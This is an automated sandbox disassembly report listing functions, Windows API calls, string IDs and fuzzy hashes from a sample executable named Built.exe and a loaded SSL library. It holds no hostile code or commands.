                                                                      • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$df5c253c0b3dd24916e4ec7cf77d3db5294cc9fd45ae7b9c5e82ad8197f38a24$misuse
                                                                      • API String ID: 0-1807708480
                                                                      • Opcode ID: 7361e034c5f3c065c3ffd55b5c74443cd79c86dfaea71e7c77c4f61fd9c4d99e
                                                                      • Instruction ID: 485dd08316c14f2fa5cc63fbf6c54d7bf1143194305f42a0baf7d6277fbc3d00
                                                                      • Opcode Fuzzy Hash: 7361e034c5f3c065c3ffd55b5c74443cd79c86dfaea71e7c77c4f61fd9c4d99e
                                                                      • Instruction Fuzzy Hash: CBE15126F09BC581E7568B3895147FC6360FBA9B88F259235DF9C17396EF38A1D58300
                                                                      APIs
                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC38C
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5DC25B), ref: 00007FF76D5DC417
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                      • Instruction ID: 458f2ce71b43a27e06bc881334e9649ee0d8683f66b9631d7c4f1d92e81d0303
                                                                      • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                      • Instruction Fuzzy Hash: 1591E632F2C652C5F760EF6594602BDABA0BB08B89F944139DE1E56E86EF38D441C734
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 1956198572-0
                                                                      • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                      • Instruction ID: 80d1beb9ce618d1b8a3ef159b9948ece14119529072c8ea31644ced54649c984
                                                                      • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                      • Instruction Fuzzy Hash: DB118A21A2C242C1FB65BB5AE545379A252EF88B81FC49135DE4906F9BDD3DD4818930
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $..\s\ssl\statem\extensions_srvr.c
                                                                      • API String ID: 0-1533168471
                                                                      • Opcode ID: 3a3098dfb846c9c121a9c1ce49b31b97a850979f605987c42cedba07d40a0cf7
                                                                      • Instruction ID: c99d54f6b8585769e803f59737ed2b5f5f5e9220240747a5215dbb41d5181c0c
                                                                      • Opcode Fuzzy Hash: 3a3098dfb846c9c121a9c1ce49b31b97a850979f605987c42cedba07d40a0cf7
                                                                      • Instruction Fuzzy Hash: FA12B567F1868242FB249E21D465BFE67A1EB80B88F446035DA6D866CDDF3CE64DC700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007$E13301210
                                                                      • String ID: ..\s\ssl\ssl_sess.c
                                                                      • API String ID: 214908505-2868363209
                                                                      • Opcode ID: ab109126bee30d2ec08c4dc11c06369e4797c85e910cf8a983de278d297afffd
                                                                      • Instruction ID: fecac81c5e0961ad71e4cc94d3df11f11d4a18364d04ae035700ba0cfa7a7aeb
                                                                      • Opcode Fuzzy Hash: ab109126bee30d2ec08c4dc11c06369e4797c85e910cf8a983de278d297afffd
                                                                      • Instruction Fuzzy Hash: 23C17C3BF0868286EB658B16D560BE933A0FB84B88F14A135EE5D477D9DF39E449C700
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5E12D4: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF76D5E1610), ref: 00007FF76D5E12FE
                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF76D5E1741), ref: 00007FF76D5E19E9
                                                                      • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF76D5E1741), ref: 00007FF76D5E1A2D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: CodeInfoPageValid
                                                                      • String ID: [oV116
                                                                      • API String ID: 546120528-247592185
                                                                      • Opcode ID: e63c6c68172dbc7893da588430885f5c2570785f87c2278c930a00c0814f328b
                                                                      • Instruction ID: 1ee9ed9f20b53ed7eab1648a6966a823142f64864617f6d6888a347a4c288a26
                                                                      • Opcode Fuzzy Hash: e63c6c68172dbc7893da588430885f5c2570785f87c2278c930a00c0814f328b
                                                                      • Instruction Fuzzy Hash: CA81B462A2C682C6E765BF26A044579F7A5EB58780FC84035CE8E47E92FE3CF541C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007B6570
                                                                      • String ID: ..\s\ssl\d1_srtp.c$H
                                                                      • API String ID: 4069847057-1001428523
                                                                      • Opcode ID: fb930fba680c5a720dae2e7a20aef1e6e810cd35922df4da2ba3306aa5a611b6
                                                                      • Instruction ID: 3ec74f0471234e1151247a14f5042210eb218d34536966da1b6011a01d29bd58
                                                                      • Opcode Fuzzy Hash: fb930fba680c5a720dae2e7a20aef1e6e810cd35922df4da2ba3306aa5a611b6
                                                                      • Instruction Fuzzy Hash: F241C32BF1D24289FB199B29A421BFA5691AF48B80F546431ED2D877CDDF3CE54E8700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Info
                                                                      • String ID: $[oV116
                                                                      • API String ID: 1807457897-413529578
                                                                      • Opcode ID: 303d47dc9d7a462e28912bc7ff4cfd28ceca2aa4ad540973da8af8c9648a8d3d
                                                                      • Instruction ID: 38e11d45733a7ba856060eda241ad14002d14eac341bd76ed233687d2f9edce7
                                                                      • Opcode Fuzzy Hash: 303d47dc9d7a462e28912bc7ff4cfd28ceca2aa4ad540973da8af8c9648a8d3d
                                                                      • Instruction Fuzzy Hash: A2519372A2C7C1C6E721AF24E0847ADB7A0F748744F944136DB8E47A86EB7CD545CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                      • String ID: ?
                                                                      • API String ID: 1286766494-1684325040
                                                                      • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                      • Instruction ID: 5b24d7d7d8e1809f1cd3ac0a373fdfb3f1329f035c4cc1df6e93142e161c2ac6
                                                                      • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                      • Instruction Fuzzy Hash: 4E41D822A2C682C6FB64BB25941177AD750EF8DBA4F944235EE6C06ED6FF3CD4818710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: StringType
                                                                      • String ID: [oV116$verbose
                                                                      • API String ID: 4177115715-2993820990
                                                                      • Opcode ID: c096a06b8cd5c460450c28d262d2bd2cc08537fd5ffa77b441f85804865d824d
                                                                      • Instruction ID: 00bad93620f2b2dc71f9bd9a093b3045b31b6d56df67c3dbfc71598bdcc66e7b
                                                                      • Opcode Fuzzy Hash: c096a06b8cd5c460450c28d262d2bd2cc08537fd5ffa77b441f85804865d824d
                                                                      • Instruction Fuzzy Hash: B3417762A1864285EB646E21D8007A9A291FB487A8F984535EE5D47FDAEF3CD4418320
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D835E
                                                                        • Part of subcall function 00007FF76D5D9C58: HeapFree.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C6E
                                                                        • Part of subcall function 00007FF76D5D9C58: GetLastError.KERNEL32(?,?,?,00007FF76D5E2032,?,?,?,00007FF76D5E206F,?,?,00000000,00007FF76D5E2535,?,?,?,00007FF76D5E2467), ref: 00007FF76D5D9C78
                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF76D5CBEC5), ref: 00007FF76D5D837C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\Built.exe
                                                                      • API String ID: 3580290477-3074098987
                                                                      • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                      • Instruction ID: 4264282602f076345a22c95d98c3d56f1b3de88ff10150415223d461c1dbb03d
                                                                      • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                      • Instruction Fuzzy Hash: B7419E32A2CA52C5E724FF2598611BCA794EB487C4B855035EE2D03B86EE3CE480C334
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: [oV116
                                                                      • API String ID: 442123175-247592185
                                                                      • Opcode ID: dcf434cc05848051654b827cd9a301ac8e3be28b5d08f60baa7fbca5dd2ecce2
                                                                      • Instruction ID: cc6e83006446489d4947ceaabfcd501004732ba21c5bd327c3a260f918c0097a
                                                                      • Opcode Fuzzy Hash: dcf434cc05848051654b827cd9a301ac8e3be28b5d08f60baa7fbca5dd2ecce2
                                                                      • Instruction Fuzzy Hash: 2031B172B29A42C6DB20BF15E4802A9A3B1FB58784F844435EF5D87B56EF3CD451CB24
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: DriveType
                                                                      • String ID: ./\$[oV116
                                                                      • API String ID: 338552980-1764669499
                                                                      • Opcode ID: 27a464a6fde7d61cd9f6e5bcdfb95c6e340156c29a74087914564c7ab83c7f7e
                                                                      • Instruction ID: 096fdb51eacc172927ef4cd94eca1d8ec4ed1155b4d4c97f60efe073cb8e9e6a
                                                                      • Opcode Fuzzy Hash: 27a464a6fde7d61cd9f6e5bcdfb95c6e340156c29a74087914564c7ab83c7f7e
                                                                      • Instruction Fuzzy Hash: B5218F21A2C683C5EA60BF1594212BDA250AF99790FC95130EE3D17BD3EE3CE4418738
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: [oV116
                                                                      • API String ID: 442123175-247592185
                                                                      • Opcode ID: d7f8f287b1e63e7b63fa21a4db5d8b560d2b642b394443e798d6f697f82f448f
                                                                      • Instruction ID: 99f7cca1191d9f92dbd095bcab0f511c42674a12f7127843c6f6810f9975275d
                                                                      • Opcode Fuzzy Hash: d7f8f287b1e63e7b63fa21a4db5d8b560d2b642b394443e798d6f697f82f448f
                                                                      • Instruction Fuzzy Hash: A731C232A2CB85CADB10BF15E4402A9B771FB18780F844032DE5D83B16EE3CD451CB24
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2062027235.00007FFDF7151000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF7150000, based on PE: true
                                                                      • Associated: 00000003.00000002.2061936641.00007FFDF7150000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71C6000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71E9000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71F4000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2062027235.00007FFDF71FE000.00000040.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063211798.00007FFDF7201000.00000080.00000001.01000000.0000001B.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063253690.00007FFDF7203000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7150000_Built.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ..\s\ssl\ssl_sess.c$T
                                                                      • API String ID: 0-2647723609
                                                                      • Opcode ID: 5880672ac5d53579d539c506b9ea1cefb64f0d00ca576262034d82b874cbd273
                                                                      • Instruction ID: 858c6aedd9fd6412faa92cea9d55069202450b4bd2e1dd0ac081aa565c98dd08
                                                                      • Opcode Fuzzy Hash: 5880672ac5d53579d539c506b9ea1cefb64f0d00ca576262034d82b874cbd273
                                                                      • Instruction Fuzzy Hash: 55216F3AF1864282FB449B65D865BEA66A0EF44744F88503AEA1C477C9EF3DE50DCB01
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C872C
                                                                      • CreateSymbolicLinkW.KERNEL32(?,00007FF76D5C11A7), ref: 00007FF76D5C411B
                                                                      • GetLastError.KERNEL32 ref: 00007FF76D5C412E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$CreateErrorLastLinkSymbolic
                                                                      • String ID: [oV116
                                                                      • API String ID: 1423938079-247592185
                                                                      • Opcode ID: f4a98f2b695cc099850f883339abc80f8baf895b83380dd6bddf53da4f0bd991
                                                                      • Instruction ID: a40d9f6efd513514c5a27f64b4fdb419218837cc9bef08ced83e5c1d617395cb
                                                                      • Opcode Fuzzy Hash: f4a98f2b695cc099850f883339abc80f8baf895b83380dd6bddf53da4f0bd991
                                                                      • Instruction Fuzzy Hash: 2B119D61A2C682C1FA20BB11A4447B9A2A5AF1C781FC40039DE9D56F87FE3CE5488E31
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                      • Instruction ID: 2208e2ca89cdb8591cc6fd828f02bf8c8e24d4a21ad73fb7a40a641dd933d887
                                                                      • Opcode Fuzzy Hash: 353d784395b77eefcba7ec404c7e4e47dbaba59ece92a9373595b893a828088a
                                                                      • Instruction Fuzzy Hash: D111493662DB8582EB219B15E440269B7E0FB88B89F984234DE8D07B69EF3CC5518B10
                                                                      APIs
                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5D4B49), ref: 00007FF76D5D4C67
                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF76D5D4B49), ref: 00007FF76D5D4C7D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
